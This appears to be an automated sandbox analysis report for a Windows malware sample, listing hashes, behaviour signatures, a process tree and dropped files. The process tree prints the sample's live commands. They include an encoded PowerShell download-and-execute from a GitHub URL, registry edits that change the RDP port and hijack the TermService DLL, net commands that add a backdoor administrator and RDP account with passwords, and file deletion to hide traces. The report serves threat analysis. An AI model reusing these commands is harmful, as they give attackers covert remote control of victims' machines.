Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
11-06-2021 14:56
General
-
Target
7a383f57f7d2190d9af3e57d67cfb004.exe
-
Size
6.9MB
-
MD5
7a383f57f7d2190d9af3e57d67cfb004
-
SHA1
2e783c279542ea1708854413a0cd725184f8fa78
-
SHA256
f18e085889d9d7324c57ecb800563ba2e808c0ef8ad52b7b1f1f3afa169bf836
-
SHA512
0f2509170c215efd58a09b4a00d593f087773da93f1877aab9b9f24474b06ad62494fa730fc435829a0365d7bd3d7440818a99e1b4c866882a0ed1cdc3eec9cb
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Blocklisted process makes network request 9 IoCs
-
Executes dropped EXE 3 IoCs
-
Modifies RDP port number used by Windows 1 TTPs
-
Sets DLL path for service in the registry 2 TTPs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Deletes itself 1 IoCs
-
Loads dropped DLL 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Program Files directory 4 IoCs
-
Drops file in Windows directory 19 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies data under HKEY_USERS 64 IoCs
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Script User-Agent 4 IoCs
Uses user-agent string associated with script host/environment.
-
Suspicious behavior: EnumeratesProcesses 18 IoCs
-
Suspicious behavior: LoadsDriver 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\7a383f57f7d2190d9af3e57d67cfb004.exe"C:\Users\Admin\AppData\Local\Temp\7a383f57f7d2190d9af3e57d67cfb004.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c C:\Windows\system32\cmd < Poi.vsd2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^nZwSZJdQSZwKBWJCtpbfZHNwzsXALugVPsbikcLGmlTQMSJGkUUtRoHQkZmHLQyLLuVpnCdInRQPNWfBIsgQkprGKGWkWrUJtiyFXmiJDkGqaSrgKXZxBgABegmS$" Che.vsd4⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vostra.exe.comVostra.exe.com D4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vostra.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vostra.exe.com D5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vostra.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vostra.exe.com6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'7⤵
- Deletes itself
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jd5y2gwd\jd5y2gwd.cmdline"8⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAD38.tmp" "c:\Users\Admin\AppData\Local\Temp\jd5y2gwd\CSC3358E928C6584838BD4D118D3AA38383.TMP"9⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f8⤵
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f8⤵
- Modifies registry key
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f8⤵
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add8⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add9⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr8⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr9⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr10⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr11⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService8⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService9⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService10⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService11⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f8⤵
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f8⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 304⤵
- Runs ping.exe
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc Ghar4f5 /del1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc Ghar4f5 /del2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc Ghar4f5 /del3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc DI6t4nmh /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user wgautilacc DI6t4nmh /add2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc DI6t4nmh /add3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" wgautilacc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD3⤵
-
C:\Windows\System32\cmd.execmd /C net.exe user wgautilacc DI6t4nmh1⤵
-
C:\Windows\system32\net.exenet.exe user wgautilacc DI6t4nmh2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc DI6t4nmh3⤵
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\cmd.execmd.exe /C net user wgautilacc 12341⤵
-
C:\Windows\system32\net.exenet user wgautilacc 12342⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user wgautilacc 12343⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Armario.vsdMD5
b166004bb483196fdfed1ff529fbab5d
SHA18791d9f6c24f2c0ceb1890a122ba963cbd000bb4
SHA256f226f152d6028727a02b0e53270ffe84de977820cbf8e7ef88ed92e84d93dd6e
SHA5121b70385424124cc43970236dee9ca2b820ea67aa14241e76b131def1eeea5e86f727e7aec32685a7e84e2d292c8641ccca40f86ac61e32f26ace25018f8532fd
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Che.vsdMD5
22cf0f40a76342274fc11807e9bf11f8
SHA14ae2b8e887b09d6bdb1ea8b2a69787d86c5f6c3a
SHA25622cae1b1a1b5e82652921b6860e3cf9e3244b41faee4abfae287d84867e2cb2a
SHA5120d8079c4f32688e9f72473982d415d848995d797b6b144f092011073c1fd63853a078a8f470f0da9083bd4900718c05ece672e96cc67f33ae745d2982a22a628
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\DMD5
b166004bb483196fdfed1ff529fbab5d
SHA18791d9f6c24f2c0ceb1890a122ba963cbd000bb4
SHA256f226f152d6028727a02b0e53270ffe84de977820cbf8e7ef88ed92e84d93dd6e
SHA5121b70385424124cc43970236dee9ca2b820ea67aa14241e76b131def1eeea5e86f727e7aec32685a7e84e2d292c8641ccca40f86ac61e32f26ace25018f8532fd
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Poi.vsdMD5
6a0c13b3b8039e95c808cfb008f26b4b
SHA166e719e05c0bdb69a9f95dfdc1a54d626c9eb667
SHA256158d9b907399f5b5da7decd462a704cd44c03f3bad934271ba1e2164b1230377
SHA51244576ecc0673958d46efd1417042e6141e6ebab1516414736b5d171153a9a068e0e0e52c942fba09b886ff5e11a88f53f434ecf42b9e6c33c192c6efb56fc9fc
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Veduto.vsdMD5
3c2f37a9838a0b5aa9fb0986ecba0d11
SHA1b06377a345b2a7527063b3d0405ee50bbf7c1433
SHA256b0b36c48206e2662c9aaca05b8e03f3378cf1052c383fda02a793d1277a71f93
SHA512cd0189a87ff971e392d3f7811c77fc8ec68424056060bd72d4ca924723955565ab07e377a142c8a5265cbb80274de353ca3e5d27194d272393794105306678ce
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vostra.exe.comMD5
f83ab141e29899ceb5308dabde894a0e
SHA16ea46bb7102125fa5d39b77547dab28ec346e9f9
SHA256ce2fb05b7d6e31db76127521aac02d9b3d595058ba13687c4ad6c68088eb8d99
SHA512d79ccd447e15899efbc68e351d2500efc8ad6c106eb76565105e5eec3ace6a02435d6569d23efc65527d00c878eb22f4afabfdca440d9b573548e18fdea72847
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vostra.exe.comMD5
f83ab141e29899ceb5308dabde894a0e
SHA16ea46bb7102125fa5d39b77547dab28ec346e9f9
SHA256ce2fb05b7d6e31db76127521aac02d9b3d595058ba13687c4ad6c68088eb8d99
SHA512d79ccd447e15899efbc68e351d2500efc8ad6c106eb76565105e5eec3ace6a02435d6569d23efc65527d00c878eb22f4afabfdca440d9b573548e18fdea72847
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Vostra.exe.comMD5
f83ab141e29899ceb5308dabde894a0e
SHA16ea46bb7102125fa5d39b77547dab28ec346e9f9
SHA256ce2fb05b7d6e31db76127521aac02d9b3d595058ba13687c4ad6c68088eb8d99
SHA512d79ccd447e15899efbc68e351d2500efc8ad6c106eb76565105e5eec3ace6a02435d6569d23efc65527d00c878eb22f4afabfdca440d9b573548e18fdea72847
-
C:\Users\Admin\AppData\Local\Temp\RESAD38.tmpMD5
f4f91cafe2b46c219327deaa4b5873d1
SHA1db21216dc794bcaf72beeb0e3567d70b5c6e8c01
SHA256c830c58b82e39d0dc261a4258530cbdbd543f2da8106288f315f08323c0c0c5d
SHA51266044f29384e8f57ca9b39056e0bea0cde2c58379dd8dfeeb14a458be766a745afb1be38c47ed9d12a7882cc18b6ea406ebef1306653382218926e23dd21ea25
-
C:\Users\Admin\AppData\Local\Temp\jd5y2gwd\jd5y2gwd.dllMD5
c64073d64020cd05932222f7fdcbd515
SHA145a9a1fbcc082c745b5f0af85e20d99dd2ea4f62
SHA256c64f26fad939e3b59c19827fe3ad3d1b04ac54ccdf0f2b1b419033671984d18c
SHA51216c74f673698dbcc21f7ce471168ce33767449b10b5316664c63ee2caf60d9c495c2e6619cb0ea7a8e4e33d08893b9a580d46a23ce895f73d154130db6638062
-
C:\Users\Admin\AppData\Local\Temp\ready.ps1MD5
3447df88de7128bdc34942334b2fab98
SHA1519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb
SHA2569520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9
SHA5122ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f
-
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1MD5
920b50692e0e9c4e32c79f89fafce0c4
SHA14cb71db2bb05daa4e84c649b6c58cbfd20c8e484
SHA25685fda9140e2356752f4139c674b78e36e4bb5da57b7cff27d8db357a4357deaf
SHA512966f23d6366c0a901114e84e64e9d209e77f1de6e40e93ad7d55047732b4ba213fdac8f05cd21cebfe11a0bab79e2cc95739fa3c6eb0eafc917568a7168c7d86
-
\??\c:\Users\Admin\AppData\Local\Temp\jd5y2gwd\CSC3358E928C6584838BD4D118D3AA38383.TMPMD5
bcbe07eee0efc7deed201f89b9792453
SHA1872dee314db6d5f2fcacb5eff113c01a65ae1ad7
SHA2565350d5afd9489daf37802fa369a301c392d9bbe0e37777fead2c524426da4703
SHA51233085749dd9be3e90ed030425fe2b188fe0466cc55d2cd306d3d5f20b5074b25bc4ad88bbcc831b4efc8db0eb0c0de224876f22fd99cc85069e44a822a6c82a6
-
\??\c:\Users\Admin\AppData\Local\Temp\jd5y2gwd\jd5y2gwd.0.csMD5
4864fc038c0b4d61f508d402317c6e9a
SHA172171db3eea76ecff3f7f173b0de0d277b0fede7
SHA2560f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84
SHA5129e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31
-
\??\c:\Users\Admin\AppData\Local\Temp\jd5y2gwd\jd5y2gwd.cmdlineMD5
a022555ed6b40311c3a3dff84c00ba55
SHA192279ed1eaf6a178a7e40f35e478cf889b2333e6
SHA2560232efa937e1fed4224678d024457378bfcdc3363c8b40b5771501af6366b330
SHA5122bdadcc6ff58d1bc124fad41c4d36971b675f674ffe0ac0fb9e958a992873b4d14897b84c2e44a4cd157b8ef24d2d3b3a9e8b8aa469a29b265c1d5180afa4f1c
-
\Windows\Branding\mediasrv.pngMD5
96a6c5d47b0670a98699b2b424e2e65e
SHA157a31831c368efd82801f94a1b72c7230f4288be
SHA256bba6c1f56f0b7f40778d8e862aba528160e02890bb0313dfe1f934e4aafca05f
SHA512b3107141bc206c12afc80c673463288057d6d302c44b568746af5e530f214c5e136ca7edb07c70afa0b6abd6720e7cd4917a4cdd6c82c7d3d5528b76222e6c55
-
\Windows\Branding\mediasvc.pngMD5
a3da4eee0a06c45c5bec80fd959ad539
SHA1a8d2d3691af2e1af85ed8947347d0981017b7a32
SHA2568a7fc19bdb25f16870854c72f936ed9598ffefc4da506bad61e13a890acfae9c
SHA5128d3dcf7d05930b390f8c8928d8910c0b8aa19604d195c8ab4001b73a4866ad4adabc772bee9a391433c2946eeb427f4f1e08092ee8dc7056fe45a1db035e822b
-
memory/60-117-0x0000000000000000-mapping.dmp
-
memory/196-264-0x0000000000000000-mapping.dmp
-
memory/492-251-0x0000000000000000-mapping.dmp
-
memory/776-233-0x0000000000000000-mapping.dmp
-
memory/816-128-0x000001FBCCB10000-0x000001FBCD166000-memory.dmpFilesize
6.3MB
-
memory/816-136-0x000001FBF4CB6000-0x000001FBF4CB7000-memory.dmpFilesize
4KB
-
memory/816-135-0x000001FBF4CB5000-0x000001FBF4CB6000-memory.dmpFilesize
4KB
-
memory/816-134-0x000001FBF4CB3000-0x000001FBF4CB5000-memory.dmpFilesize
8KB
-
memory/816-133-0x000001FBF4CB0000-0x000001FBF4CB2000-memory.dmpFilesize
8KB
-
memory/816-131-0x000001FBCCB10000-0x000001FBCD166000-memory.dmpFilesize
6.3MB
-
memory/816-130-0x000001FBF50F0000-0x000001FBF5511000-memory.dmpFilesize
4.1MB
-
memory/1276-144-0x00000216C9FF0000-0x00000216C9FF1000-memory.dmpFilesize
4KB
-
memory/1276-174-0x00000216CB520000-0x00000216CB521000-memory.dmpFilesize
4KB
-
memory/1276-158-0x00000216CA066000-0x00000216CA068000-memory.dmpFilesize
8KB
-
memory/1276-150-0x00000216CAD40000-0x00000216CAD41000-memory.dmpFilesize
4KB
-
memory/1276-175-0x00000216CA068000-0x00000216CA069000-memory.dmpFilesize
4KB
-
memory/1276-149-0x00000216CA063000-0x00000216CA065000-memory.dmpFilesize
8KB
-
memory/1276-147-0x00000216CA060000-0x00000216CA062000-memory.dmpFilesize
8KB
-
memory/1276-173-0x00000216CB190000-0x00000216CB191000-memory.dmpFilesize
4KB
-
memory/1276-166-0x00000216CA040000-0x00000216CA041000-memory.dmpFilesize
4KB
-
memory/1276-137-0x0000000000000000-mapping.dmp
-
memory/1340-229-0x0000000000000000-mapping.dmp
-
memory/2096-253-0x0000000000000000-mapping.dmp
-
memory/2300-224-0x0000027E5EC46000-0x0000027E5EC48000-memory.dmpFilesize
8KB
-
memory/2300-220-0x0000000000000000-mapping.dmp
-
memory/2300-225-0x0000027E5EC48000-0x0000027E5EC4A000-memory.dmpFilesize
8KB
-
memory/2300-223-0x0000027E5EC43000-0x0000027E5EC45000-memory.dmpFilesize
8KB
-
memory/2300-222-0x0000027E5EC40000-0x0000027E5EC42000-memory.dmpFilesize
8KB
-
memory/2616-159-0x0000000000000000-mapping.dmp
-
memory/2680-162-0x0000000000000000-mapping.dmp
-
memory/2724-254-0x0000000000000000-mapping.dmp
-
memory/2824-255-0x0000000000000000-mapping.dmp
-
memory/3032-235-0x0000000000000000-mapping.dmp
-
memory/3036-116-0x0000000000000000-mapping.dmp
-
memory/3236-236-0x0000000000000000-mapping.dmp
-
memory/3364-249-0x0000000000000000-mapping.dmp
-
memory/3440-230-0x0000000000000000-mapping.dmp
-
memory/3564-231-0x0000000000000000-mapping.dmp
-
memory/3596-232-0x0000000000000000-mapping.dmp
-
memory/3612-248-0x0000000000000000-mapping.dmp
-
memory/3676-114-0x0000000000000000-mapping.dmp
-
memory/3684-245-0x0000000000000000-mapping.dmp
-
memory/3828-246-0x0000000000000000-mapping.dmp
-
memory/3848-256-0x0000000000000000-mapping.dmp
-
memory/3848-260-0x0000020202F78000-0x0000020202F79000-memory.dmpFilesize
4KB
-
memory/3848-259-0x0000020202F76000-0x0000020202F78000-memory.dmpFilesize
8KB
-
memory/3848-258-0x0000020202F73000-0x0000020202F75000-memory.dmpFilesize
8KB
-
memory/3848-257-0x0000020202F70000-0x0000020202F72000-memory.dmpFilesize
8KB
-
memory/3888-127-0x00000264709C0000-0x00000264709C1000-memory.dmpFilesize
4KB
-
memory/3888-252-0x0000000000000000-mapping.dmp
-
memory/3888-124-0x0000000000000000-mapping.dmp
-
memory/3952-226-0x0000000000000000-mapping.dmp
-
memory/4016-261-0x0000000000000000-mapping.dmp
-
memory/4024-182-0x0000000000000000-mapping.dmp
-
memory/4024-217-0x000002710A738000-0x000002710A73A000-memory.dmpFilesize
8KB
-
memory/4024-196-0x000002710A733000-0x000002710A735000-memory.dmpFilesize
8KB
-
memory/4024-195-0x000002710A730000-0x000002710A732000-memory.dmpFilesize
8KB
-
memory/4024-199-0x000002710A736000-0x000002710A738000-memory.dmpFilesize
8KB
-
memory/4168-243-0x0000000000000000-mapping.dmp
-
memory/4188-244-0x0000000000000000-mapping.dmp
-
memory/4220-234-0x0000000000000000-mapping.dmp
-
memory/4256-120-0x0000000000000000-mapping.dmp
-
memory/4256-237-0x0000000000000000-mapping.dmp
-
memory/4276-122-0x0000000000000000-mapping.dmp
-
memory/4324-263-0x0000000000000000-mapping.dmp
-
memory/4384-262-0x0000000000000000-mapping.dmp
-
memory/4604-219-0x00000287380A3000-0x00000287380A5000-memory.dmpFilesize
8KB
-
memory/4604-216-0x0000000000000000-mapping.dmp
-
memory/4604-218-0x00000287380A0000-0x00000287380A2000-memory.dmpFilesize
8KB
-
memory/4604-221-0x00000287380A6000-0x00000287380A8000-memory.dmpFilesize
8KB
-
memory/4672-242-0x0000000000000000-mapping.dmp
-
memory/4724-241-0x0000000000000000-mapping.dmp
-
memory/4736-250-0x0000000000000000-mapping.dmp
-
memory/4892-227-0x0000000000000000-mapping.dmp
-
memory/4956-247-0x0000000000000000-mapping.dmp
-
memory/4980-228-0x0000000000000000-mapping.dmp
-
memory/5012-238-0x0000000000000000-mapping.dmp
